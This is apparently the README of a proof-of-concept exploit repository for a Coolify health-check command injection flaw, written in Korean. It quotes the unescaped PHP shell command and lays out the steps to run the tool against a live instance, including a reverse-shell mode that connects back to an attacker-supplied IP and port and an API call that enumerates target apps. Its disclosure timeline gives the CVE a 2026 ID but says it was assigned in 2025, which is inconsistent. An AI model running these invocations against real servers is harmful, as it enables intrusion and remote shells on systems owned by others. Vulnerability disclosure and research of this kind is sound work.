
Health Check의 OS 명령 주입 → 원격 코드 실행
Coolify 헬스 체크 구성의 OS 명령어 주입에 대한 개념 증명(PoC) 익스플로잇입니다.
인증된 사용자라면 누구나 배포된 컨테이너 내부에서 임의의 명령어를 실행할 수 있습니다.
**Coolify**는 인기 있는 오픈소스 자체 호스팅 배포 플랫폼으로(GitHub 스타 30K+), Heroku, Vercel, Netlify의 무료 대안입니다.
Coolify의 헬스 체크 구성에서 치명적인 OS 명령어 주입 취약점이 발견되었습니다. health_check_host, health_check_method, health_check_path 파라미터가 어떠한 검증도 없이 셸 명령어에 직접 삽입되어, 인증된 사용자라면 누구나 배포 컨테이너 내부에서 임의의 명령어를 실행할 수 있습니다.
┌──────────────────┬──────────────────────────────────────┐
│ CVE ID │ CVE-2026-59734 │
│ Type │ OS Command Injection (CWE-78) │
│ Severity │ HIGH — CVSS 8.8 │
│ Attack Vector │ Network (Authenticated) │
│ Affected │ Coolify <= v4.0.0-beta.460 │
│ Fixed In │ Coolify >= v4.0.0-beta.469 │
│ Fix Commit │ 23f9156c7 │
│ Reporter │ CyberTechAjju │
└──────────────────┴──────────────────────────────────────┘
// app/Jobs/ApplicationDeploymentJob.php — generate_healthcheck_commands()
// ⚠️ User input directly in shell command — NO escapeshellarg()!
$generated_healthchecks_commands = [
"curl -s -X {$this->application->health_check_method} -f " .
"{$this->application->health_check_scheme}://" .
"{$this->application->health_check_host}:" .
"{$health_check_port}" .
"{$this->application->health_check_path} > /dev/null || exit 1",
];
이 PoC 스크립트는 두 가지 모드로 CVE-2026-59734를 검증하고 익스플로잇합니다:
| 모드 | 설명 | 위험 |
|---|---|---|
--local | 취약한 코드 패턴을 오프라인으로 시뮬레이션합니다. 네트워크 요청이 없습니다. 주입 가능한 3가지 파라미터를 모두 테스트하고 수정 사항을 검증합니다. | ✅ 안전 |
--remote | API를 통해 실제 Coolify 인스턴스를 익스플로잇합니다. 헬스 체크 구성에 페이로드를 주입하고 배포를 트리거합니다. | ⚠️ 인증 필요 |
host, method, path를 통한 주입 검증 + escapeshellarg() 수정이 동작하는지 확인--lhost / --lport를 사용하는 내장 리버스 셸 페이로드git clone https://github.com/cybertechajju/CVE-2026-59734.git
cd CVE-2026-59734
chmod +x coolify_healthcheck_rce_poc.sh
# Run safe local validation
./coolify_healthcheck_rce_poc.sh --local
예상 출력:
═══ LOCAL VULNERABILITY PATTERN VALIDATION ═══
┌─ Test 1: health_check_host injection
│ ✅ VULNERABLE — Injected command executed successfully
┌─ Test 2: health_check_method injection
│ ✅ VULNERABLE — Method parameter also injectable
┌─ Test 3: health_check_path injection
│ ✅ VULNERABLE — Path parameter also injectable
┌─ Test 4: Verify that escapeshellarg() fixes the issue
│ ✅ SAFE — Sanitized input prevents injection
# Basic PoC — writes proof file inside the container
./coolify_healthcheck_rce_poc.sh --remote \
--url https://your-coolify-instance:3000 \
--token YOUR_API_TOKEN \
--uuid YOUR_APP_UUID
# Reverse shell
./coolify_healthcheck_rce_poc.sh --remote \
--url https://your-coolify-instance:3000 \
--token YOUR_API_TOKEN \
--uuid YOUR_APP_UUID \
--lhost YOUR_IP \
--lport 4444
# With auto-cleanup (restores original config after exploit)
./coolify_healthcheck_rce_poc.sh --remote \
--url https://your-coolify-instance:3000 \
--token YOUR_API_TOKEN \
--uuid YOUR_APP_UUID \
--cleanup
Usage:
Local Validation (safe, offline):
./coolify_healthcheck_rce_poc.sh --local
Remote Exploit (requires auth):
./coolify_healthcheck_rce_poc.sh --remote --url <URL> --token <TOKEN> --uuid <UUID> [OPTIONS]
Options:
--url Coolify instance URL (e.g. https://coolify.example.com)
--token API Bearer token
--uuid Target application UUID
--payload Custom injection payload
--lhost Attacker IP for reverse shell
--lport Attacker port for reverse shell (default: 4444)
--cleanup Restore original config after exploit
API 토큰:
앱 UUID:
curl -s https://YOUR-COOLIFY/api/v1/applications \
-H "Authorization: Bearer YOUR_TOKEN" | jq '.[].uuid'
발견 과정, 익스플로잇, 그리고 얻은 교훈 전체를 설명하는 상세 블로그 글을 작성했습니다:
🔗 Coolify에서 OS 명령어 주입(RCE)을 발견한 방법 — Medium
YouTube에서 전체 익스플로잇 데모를 시청하세요:
🔗 CVE-2026-59734 — Coolify RCE 데모 — YouTube
| 날짜 | 이벤트 |
|---|---|
| 2025년 1월 6일 | 🔍 GitHub 보안 권고를 통해 발견 및 보고 |
| 2025년 1월 16일 | ✅ Coolify 메인테이너가 보고 승인 |
| 2025년 2월 24일 | 🔬 조사 확인됨 |
| 2025년 3월 18일 | 🔧 수정 커밋됨 (23f9156c7) |
| 2025년 4월 12일 | 📦 v4.0.0-beta.469에서 수정 버전 출시 |
| 2025년 7월 | 🏷️ CVE-2026-59734 배정 및 보안 권고 게시 |
이 도구는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다.
이 PoC는 감사할 명시적이고 문서화된 권한을 보유한 시스템을 테스트하려는 보안 연구원과 버그 바운티 헌터를 위해 제작되었습니다. 소유하지 않은 시스템에 대한 무단 사용은 엄격히 금지되며, 지역, 주, 연방 법률을 위반할 수 있습니다.
저자(CyberTechAjju)는 어떠한 책임도 지지 않으며, 이 도구로 인해 발생한 오용이나 손해에 대해 책임을 지지 않습니다.
| CVE | 대상 | 유형 | 심각도 |
|---|---|---|---|
| CVE-2026-45156 | Nextcloud user_oidc | JWT 서명 우회 | 🔴 치명적 (9.8) |
| CVE-2026-59734 | Coolify | OS 명령어 주입 | 🟠 높음 (8.8) |
"그들은 검증을 잊었습니다. 저는 보고를 잊지 않았습니다."
🇮🇳 행성을 해킹하자. 🌎💻